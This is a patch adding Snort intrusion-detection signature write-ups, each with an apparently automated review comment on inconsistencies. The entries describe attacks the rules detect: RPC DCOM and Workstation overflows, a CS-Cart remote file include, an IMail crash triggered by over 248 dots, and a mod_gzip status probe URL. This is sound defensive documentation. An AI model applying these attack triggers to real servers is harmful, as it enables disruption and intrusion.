+++ b/doc/signatures/2180.txt
@@ -0,0 +1,74 @@
+Rule:  
+
+--
+Sid:
+
+2180
+
+--
+Summary:
+
+This event is generated when a BitTorrent client connects to a tracker 
+to gain access to a BitTorrent network.  
+
+--
+Impact:
+
+Possible violation of policy and abuse of network resources.
+
+--
+Detailed Information:
+BitTorrent is a peer-to-peer application used for simultaneous downloads
+of large files.  BitTorrent is designed to allow multiple peers to 
+download large files simultaneously without using extraneous bandwidth 
+from a centralized server.
+
+BitTorrent's centralized server, called a tracker, refers peers to each 
+other. This rule looks for a request sent to a BitTorrent tracker from a
+peer.
+
+--
+Attack Scenarios:
+
+A user downloaded a BitTorrent client and attempts to download files 
+from a BitTorrent network.
+
+--
+Ease of Attack:
+
+Unix, Windows, and MacOS clients are publicly available for BitTorrent.
+
+--
+False Positives:
+
+Other web-based applications could use similar URLs and parameters.
+
+--
+False Negatives:
+
+The URL path "/announce" is hardcoded in the BitTorrent tracker.  If the
+URL was changed in the tracker, then this rule would not generate an 
+event.
+
+--
+Corrective Action:
+
+If this is a violation of network policy, take appropriate steps to 
+prevent further violations.
+
+--
+Contributors:
+
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+
+-- 
+Additional References:
+
+Bittorrent Protocol Specification
+http://bitconjurer.org/BitTorrent/protocol.html
+
+Wikipedia
+http://en.wikipedia.org/wiki/BitTorrent
+
+--
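Review bot: The Affected Systems section present in every other signature document is missing here; add it, and move the client platform list ("Unix, Windows, and MacOS clients are publicly available") from Ease of Attack into it, since that text is about affected systems rather than difficulty. Style: "Rule:  " and the separator before Additional References carry trailing whitespace.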
--- /dev/null
+++ b/doc/signatures/1433.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1433
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
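Review bot: The documentation never identifies which vulnerability or request pattern SID 1433 matches: Summary, Detailed Information and Attack Scenarios are generic web-server text and Additional References is empty, so the "False Positives: None known" claim cannot be evaluated. State the URI or content the rule looks for and cite the advisory.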
--- /dev/null
+++ b/doc/signatures/100000437.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000437
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "CS-Cart" application running on a webserver. Access to the file "class.cs_phpmailer.php" using a remote file being passed as the "classes_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "classes_dir" parameter in the "class.cs_phpmailer.php" script used by the "CS-Cart" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CS-Cart
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
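Review bot: The third paragraph of Detailed Information and the Attack Scenarios section describe an authentication bypass ("supply his/her own credentials to gain access"), which does not match the remote file include via the "classes_dir" parameter described in the Summary; replace that boilerplate with the file-include scenario the rule actually detects. Typo: "ona web server". Formatting: there is no blank line between the Sid value and the following "--", unlike the other documents.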
--- /dev/null
+++ b/doc/signatures/100000534.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000534
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VUBB" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "user" parameter in the "english.php" script 
+used by the "VUBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VUBB
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
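Review bot: Impact and Detailed Information overstate a cross-site scripting issue: "unauthorized administrative access to the server", "execution of arbitrary code" and "execute system binaries" are server-side outcomes, whereas Attack Scenarios correctly describes a malicious link that steals information from the user who clicks it. Reword Impact to script execution in the victim's browser, session or credential theft, and administrative actions performed within the victim's session.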
--- /dev/null
+++ b/doc/signatures/2156.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2156
+
+--
+Summary:
+This event is generated when an attempt is made to ascertain the status of the Apache module mod_gzip on a host. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to ascertain the status of the Apache module mod_gzip on a host from a source external to the protected network.
+
+mod_gzip is used to compress data sent by an Apache webserver in an attempt to preserve bandwidth and speed up communications between client and server.
+
+The attacker may be trying to gain information on the server by making a query to the mod_gzip_status page. This could lead to information disclusure which might then be used in further attacks against that host.
+
+--
+Affected Systems:
+Any host using the Apache module mod_gzip.
+
+--
+Attack Scenarios:
+An attacker can retrieve information on the server by making a request for the status of mod_gzip. This request would take the form http://www.foo.com/mod_gzip_status
+
+--
+Ease of Attack:
+Simple. No exploit required.
+
+--
+False Positives:
+The event will also be generated if Nessus is used to scan the host for this vulnerability.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable the mod_gzip module.
+
+Disallow access to mod_gzip_status from sources external to the protected network.
+
+Use the Apache directive <Location> to disallow access to the mod_gzip status page to the localhost only in the following manner:
+
+<Location /mod_gzip_status>
+    Order deny,allow
+    Deny from all
+    Allow from localhost
+</Location>
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
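Review bot: The sentence introducing the <Location> block ("disallow access to the mod_gzip status page to the localhost only") says the opposite of what the block does; the configuration denies everyone and then allows localhost, so it should read "restrict access to the mod_gzip status page to localhost only". Additional References is empty; a pointer to the mod_gzip project page or the Nessus check mentioned under False Positives would help. Typo in Detailed Information: "disclusure".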
--- /dev/null
+++ b/doc/signatures/2280.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2280
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
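Review bot: Affected Systems pins two specific builds (MediaWiki-stable 20031107 and 20030829) but Additional References is empty and Corrective Action only says "up to date version"; cite the advisory and name the first fixed release so administrators can verify they are past it. Stray space before the full stop in "MediaWiki ." in Detailed Information.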
--- /dev/null
+++ b/doc/signatures/2309.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2309
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
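Review bot: Corrective Action only says to patch; since Detailed Information places the overflow in a DCE/RPC-exposed logging function, the firewall mitigation given in 3188.txt in this same patch (blocking RPC ports from external sources with a packet filter) applies here too and is worth repeating. Minor: "None known" under False Negatives lacks the trailing period used everywhere else.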
--- /dev/null
+++ b/doc/signatures/2217.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2217
+
+--
+Summary:
+This event is generated when an attempt is made to access printmail.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in Ipswitch IMail 7.04 and earlier.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+Ipswitch IMail is a mail server that supports multiple mail protocols. Its web mail implementation contains a vulnerability in printmail.cgi where, if a mailbox name with more than 248 dot characters (.) is requested, the service will crash. It has also been reported that this is caused by a buffer overflow error that may allow an attacker to execute arbitrary code, but this has not been confirmed.
+
+--
+Affected Systems:
+Mail servers running Ipswitch Imail 7.04 and earlier with web mail enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request to printmail.cgi for a mailbox with more than 248 dot characters in the mailbox name parameter. The mail server will crash and must be restarted.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses readmail.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer version or apply the vendor-supplied hotfix available at ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail704.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/3427
+
+--
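Review bot: False Positives refers to "readmail.cgi" while Summary, Detailed Information and Attack Scenarios all concern "printmail.cgi"; one of these is wrong and the False Positives text should name the script the rule actually matches. The Summary also calls this a "buffer overflow vulnerability" while Detailed Information says code execution via overflow is unconfirmed and Impact lists only denial of service; align the Summary with that.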
--- /dev/null
+++ b/doc/signatures/115-4.txt
@@ -0,0 +1,69 @@
+
+
+Rule:
+
+--
+Sid:
+115-4
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an asn.1 spec
+violation, indicating a possible overflow attempt was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+This may indicate an attempt to overflow a fixed length buffer in an
+application using the asn1 libraries.
+
+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
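Review bot: The Attack Scenarios section is empty, and Impact is "Unknown" while Ease of Attack is "Simple" and the Summary speaks of a possible overflow attempt; either fill Attack Scenarios with the fixed-length buffer overflow scenario from Detailed Information and state Impact as possible code execution or denial of service, or mark Ease of Attack unknown as well. The file also opens with two blank lines before "Rule:" and spells "consititute".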
--- /dev/null
+++ b/doc/signatures/2215.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2215
+
+--
+Summary:
+This event is generated when an attempt is made to access nsManager.cgi on an internal web server. This may indicate an attempt to exploit an authentication vulnerability in Alabanza Control Panel 3.0 and earlier.
+
+--
+Impact:
+System integrity.
+
+--
+Detailed Information:
+Alabanza Control Panel 3.0 is an application that manages automated virtual domain administration. It contains a vulnerability which allows an attacker to bypass authentication using specially crafted HTTP requests to add, modify, or delete domains, or change MX and CNAME host information for managed hosts.
+ 
+--
+Affected Systems:
+Any domains managed by an administrator using Alabanza Control Panel 3.0 or earlier.
+
+--
+Attack Scenarios:
+An attacker crafts a URL that adds or deletes a virtual domain and transmits it to nsManager.cgi. The Alabanza Control Panel makes the requested change without prompting for a username or password.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses nsManager.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software, or apply the vendor-provided patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1710
+
+--
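Review bot: Corrective Action says to "apply the vendor-provided patch" but nothing under Additional References points to it; add the vendor advisory or patch location alongside the Bugtraq link. The line following the Detailed Information paragraph contains only a space where the other files have an empty line.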
--- /dev/null
+++ b/doc/signatures/3134.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3134
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the processing of a Portable Network Graphics (PNG) file by
+the GD Graphics Library.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that software that handles PNG files,
+libpng, allocates memory for PNG images. A maliciously formatted PNG
+image sent to a vulnerable server may cause a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.  A
+PNG file with an excessively large image height, width, or depth, or
+combination of these can cause a buffer overflow.
+
+--
+Affected Systems:
+	GD Graphics Library 2.0.28 and earlier
+
+--
+Attack Scenarios:
+An attacker can create a malformed PNG file and upload it to a web server,
+possibly causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
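Review bot: Summary and Affected Systems attribute the PNG overflow to the GD Graphics Library (2.0.28 and earlier), but Detailed Information says the flaw is in "libpng"; these are different libraries, so state which component is vulnerable and, if GD is affected through its PNG handling code or a linked libpng, say so. Additional References is empty; add the CVE or advisory for this issue.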
--- /dev/null
+++ b/doc/signatures/3188.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3188
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
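Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes a malformed DCOM request to an RPC port; either describe the trigger the rule actually detects or explain how the long filename reaches the RPC service. Additional References is empty for a well-documented Microsoft issue; add the Microsoft bulletin and CERT advisory. Typo in Ease of Attack: "Expoit".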
--- /dev/null
+++ b/doc/signatures/1094.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1094
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
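Review bot: Affected Systems is left empty, and Attack Scenarios covers only ftp while Summary and Detailed Information also name web servers and web applications; fill Affected Systems with at least the server classes named in Detailed Information and either broaden the scenario or restrict the text to what SID 1094 actually matches. Style: the separator before Additional References carries trailing whitespace.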
--- /dev/null
+++ b/doc/signatures/2404.txt
@@ -0,0 +1,92 @@
+Rule:
+
+--
+Sid:
+2404
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISS RealSecure and BlackICE products.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the ISS Analysis Module can be triggered
+by an attacker sending a single SMB packet containing an AccountName
+greater than 300 bytes. It is possible for an attacker to exploit this
+condition by sending a specially crafted packet to a host serving network shares.
+
+When the systems running one of the affected ISS products decodes the
+SMB data, exploit code may be included and executed on the machine with 
+system level privileges. Alternatively, the malformed data may cause the service to become 
+unresponsive and cause a DoS condition.
+
+Sensors under attack will display "PAM_internal_error" as a message on
+the console.
+
+Sucessful exploitation of this issue could present an attacker with the 
+opportunity to execute code of their choosing on the target host with system
+privileges. It is also possible for a Denial of Service (DoS) condition to 
+be caused by an attacker attempting to exploit this condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 20.15 through 22.9
+	Real Secure Server Sensor 7.0 XPU 20.16 through 22.9
+	Proventia A Series XPU 20.15 through 22.9
+	Proventia G Series XPU 22.3 through 22.9
+	Proventia M Series XPU 1.3 through 1.7
+	RealSecure Desktop 7.0 eba through ebh
+	RealSecure Desktop 3.6 ebr through ecb
+	RealSecure Guard 3.6 ebr through ecb
+	RealSecure Sentry 3.6 ebr through ecb
+	BlackICE PC Protection 3.6 cbr through ccb
+	BlackICE Server Protection 3.6 cbr through ccb
+
+--
+Attack Scenarios:
+An attacker may use this vulnerability to disable ISS sensors on a
+network or potentially use it to gain control of a machine running one
+of the affected products.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Data transfer between a Windows 2003 file server and other Windows based
+machines may cause this rule to generate events in some circumstances.
+Ensure that the HOME_NET and EXTERNAL_NET variables are correctly set in
+the snort.conf file to negate the effects of file transfers on local
+subnets.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+eEye
+http://www.eeye.com/html/Research/Advisories/AD20040226.html
+
+Bugtraq
+http://www.securityfocus.com/bid/9752
+
+--
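Review bot: The last section is headed "References:" instead of the "Additional References:" used by every other document in this patch; anything keying on the standard heading will miss it. Detailed Information also states the same consequence twice (the second paragraph and the "Sucessful exploitation" paragraph both describe system-level code execution or DoS), so one can be dropped along with the "Sucessful" typo, and the lines ending "serving network shares." and "cause the service to become" exceed the wrap width used in the rest of the file.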
--- /dev/null
+++ b/doc/signatures/3392.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3392
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
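Review bot: the Attack Scenarios entry ("An attacker may make a request for a file with an overly long filename via a network share") does not follow from the Detailed Information above it, which describes a malformed DCOM request sent over RPC; either explain in Detailed Information how an overly long filename reaches the RPC interface, or rewrite the scenario in terms of the malformed RPC request. "Expoit code exists" under Ease of Attack should read "Exploit code exists". Additional References is empty for a vulnerability the Summary calls "known"; add the vendor bulletin and CVE entry so the affected-systems list and the patch advice can be checked.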
--- /dev/null
+++ b/doc/signatures/959.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+959
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
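Review bot: Summary, Detailed Information and Attack Scenarios never say what this rule matches (which FrontPage Server Extensions component, path or request element), and the text is identical to 962.txt and 940.txt elsewhere in this patch, so an analyst triaging SID 959 learns nothing that distinguishes it from the other FrontPage rules. State the specific path or component the rule looks for, and fill in Additional References, which is empty despite "Many exploits exist".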
--- /dev/null
+++ b/doc/signatures/2804.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2804
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure send_and_compare_old_values
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
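Review bot: in Detailed Information the procedure name is broken across lines with the sentence's period on a line of its own ("send_and_compare_old_values" followed by a line containing only "."); join it so it reads "a vulnerability in the procedure send_and_compare_old_values. This procedure is included in dbms_repcat." Under Affected Systems, "Oracle Oracle9i" repeats the vendor name; "Oracle9i" (with the affected release) suffices. Additional References is empty; add the vendor alert for this issue.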
--- /dev/null
+++ b/doc/signatures/962.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+962
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
